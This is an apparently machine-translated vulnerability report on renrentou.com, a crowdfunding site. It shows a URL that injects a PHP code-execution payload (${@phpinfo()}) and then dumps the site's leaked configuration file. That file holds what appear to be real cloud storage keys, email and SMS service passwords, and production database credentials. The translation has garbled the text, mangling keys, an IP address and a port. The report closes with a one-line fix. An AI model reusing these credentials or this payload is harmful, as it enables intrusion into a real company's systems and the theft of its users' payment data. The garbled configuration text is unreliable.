Code execution and MySQL injection vulnerability on Renren's main site

Code execution and MySQL injection vulnerability on Renren's main site

Code execution and MySQL injection vulnerability on Renren's main site

Code Execution
 

Http://www.renrentou.com/project/list/status/%24%7b%40phpinfo () % 7d/sort/1/trade/0/p/2SQL Injection

/Article/UploadPic/2015-7/2015730171537549. png [/img] // + assets // | online configuration // + Response return array ('url' => array ('www '=> HTTP_PROTOCAL. 'www .renrentou.com ', 'admin' => HTTP_PROTOCAL. 'admin .renrentou.com ', 'user' => HTTP_PROTOCAL. 'User .renrentou.com ', 'img' => HTTP_PROT OCAL. 'static .rentou.com ', // normal attachment address 'img2' => HTTP_PROTOCAL. 'img2 .renrentou.com ', // normal attachment cdn address 'imgpui' => HTTP_PROTOCAL. 'static2 .renrentou.com ', // encrypt the attachment address 'wap' => HTTP_PROTOCAL. 'wap .renrentou.com ', 'api' => HTTP_PROTOCAL. 'api .renrentou.com ', 'app' => HTTP_PROTOCAL. 'app .renrentou.com ',), // oss attachment storage 'aliyun _ Oss' => array ('host' => 'oss -cn-qingdao-internal.aliyuncs.com ', // intranet address of the Qingdao node // 'host' => 'Oss -cn-qingdao.aliyuncs.com ', // The Internet address of the Qingdao node 'bucket' => 'renrentou', 'bucket2' => 'renrentou-private ', 'Access _ id' => 'p3k666aaxh4r0dzi', 'Access _ key' => 'fekmnnkvqqprw2tcmvkwdp6sz7vfuk ',), // you can have multiple email sending accounts. Randomly select 'email _ config' => array ('qq' => array ('host' => 'smtp .exmail.qq.com ', 'Port' => '25 ', 'username' => 'no-replay@renrentou.com.cn ', 'Password' => 'rrt123', 'from' => 'no-replay@renrentou.com ', 'fromname' => 'renren put'), 'sohu '=> array ('host' =>' http://sendcloud.sohu.com/webapi/mail.send.json ', 'Api _ user' => 'renrentou', 'api _ key' => 'dkwu4?ty=56w70', 'from' => 'service @ mail.renrentou.com ', 'fromname' => 'renren put '),), // configure 'sms _ config' => array (// yimei sms 'yimei' => array ('url' =>' http://sdk999ws.eucp.b2m.cn:8080/sdk/SDKService ', 'Username' => '9sdk-EMY-0999-JDWML', 'Password' => '123', 'sessionkey' => '123 '), // ronglian cloud communication 'yuntongxun' => array ('host' => 'app .cloopen.com ', 'Port' => '123 ', 'version' => '2017-12-26 ', 'main _ account' => '8a48b5514a61a814014a79d945a60e43', 'main _ token' => 'authorization ', 'app _ id' => 'af98f894a70a61d014a79daca760596 '), // mandao technology 'mdkj' => array ('sn '=> 'sdk-BBX-010-22614 ', /// replace it with your own serial number' Pwd' => strtoupper (md5 ('sdk-BBX-010-22614 '. 'D-7e55-4 '), // here the password needs to be encrypted in md5 (sn + password) 32-bit capital 'mobile' => '', // multiple mobile phone numbers are separated by commas (,). There is no length limit in post theory. it is recommended that a group of less than or equal to 10000 mobile phone numbers 'content' => '', // iconv (" gb2312 "," UTF-8 // IGNORE ", hi, test the text message [XXX company] '), // The text message content 'text' => '', 'stime' => '', // The scheduled time format is 11:09:21 'msgfmt' => '', 'rrid' => ''),), /* database settings */'sys _ db_type '=> 'mysql', // Database Type 'sys _ db_host' => 'f Eidurds2.mysql.rds.aliyuncs.com ', // server address 'sys _ db_name' => 'renrentou', // database name 'sys _ db_user '=> 'renrentou ', // username 'sys _ db_pwd' => 'eg8x9wedt6co ', // password 'sys _ db_port' => 3306, // port/* data cache settings */'sys _ cache_open '=> true, // whether global cache is enabled; false/true: 'sys _ cache_time' => 86400, // data cache validity period 'sys _ cache_prefix' => 'rrt _ ', // cache prefix 'sys _ cache_type' => 'redis ', 'sys _ redis_host '=> 'server1', 'sys _ redis_port' => 6379, 'sys _ default_key '=> 'djjgiudnupfy7h', // default reversible key 'sys _ platform_key' => 'dujg9d7dhfy7h', // promotion key);?> /** Do not modify the configuration file for payment without authorization **/'pay' => array ('pay _ off' => FALSE, // payment switch 'platformno' => '000000', // merchant ID 'feemode' => 'platform ', // PLATFORM: the company pays the service fee. The USER pays the service fee. Here, the charging mode is 'idcard' => 'g2 _ idcard ', // gsf-idcard is the first generation ID card G2_IDCARD is the second generation ID card. Here it is the user ID card type 'own _ account' => 1, // User account type: 'Project _ account' => 2, // User account type: 'Project _ rate' => 0.05, // The current fee deduction rate is 5% 'verifying' => 'verifying ', // The investor binds the 'verified' => 'verified 'to the bank card status authentication ', // The status of the bank card bound to the investor has been authenticated 'is _ handle' => 1, // The user callback processing has been processed 'un _ handle' => 0, // user callback processing not processed 'pay _ action_type '=> array ('torecharge' => 1, // interface partial action type recharge 'towithdraw _ own' => 2, // 'totransfer _ project' => 3, // 'freeze '=> 4, // some action types of the interface subscribe (I .e. freeze) 'unfreeze '=> 5, // some action TYPES OF THE INTERFACE cancel the bidding (unfreeze) 'loan' => 6, // The Operation Type of the interface is finalized (lending) 'eepa' => 3, // whether the operation type of the interface user has registered an ebao account), 'onlogin' => 'loginy ', // server callback 'callback' => 'callback', // the browser gateway calls back 'pay _ query_status '=> array ('Recharge _ record' => 'Recharge _ RECORD ', // recharge 'repayment _ record '=> 'repayment _ RECORD' for a single business Query type ', // The repayment of a single business Query type subject 'withraw _ record' => 'withraw _ record ', // 'payment _ record' => 'payment _ record' for a single business Query type, // investment loan for a single business Query type), 'prehat' => 2, // users' relationship interviews with the project 'subnotification' => 8, // users' relationship subscriptions to the project 'reservation' => 4, // The user subscribes for the 'Attention '=> 1 for the project relationship, // The user follows the 'freeze _ status' => array ('orientation' => 1, // only enable the targeted crowdfunding switch for subscription: 'purchase '=> 2, // only enable the share limit switch for subscription 'projector' => 3 // only determine the amount for billing by the project Party),/** configuration file for payment, do not modify ** // * database settings */'sys _ db_type '=> 'mysql', // Database Type 'sys _ db_host' => '2017. 168.1.252 ', // server address 'sys _ db_name' => 'renrentou _ dev', // database name 'sys _ db_user '=> 'root ', // username 'sys _ db_pwd '=> '000000', // password 'sys _ db_port' => 123456, // port 'sys _ db_prefix' => '', // database table prefix

 

Solution: parameter filtering and upgrade framework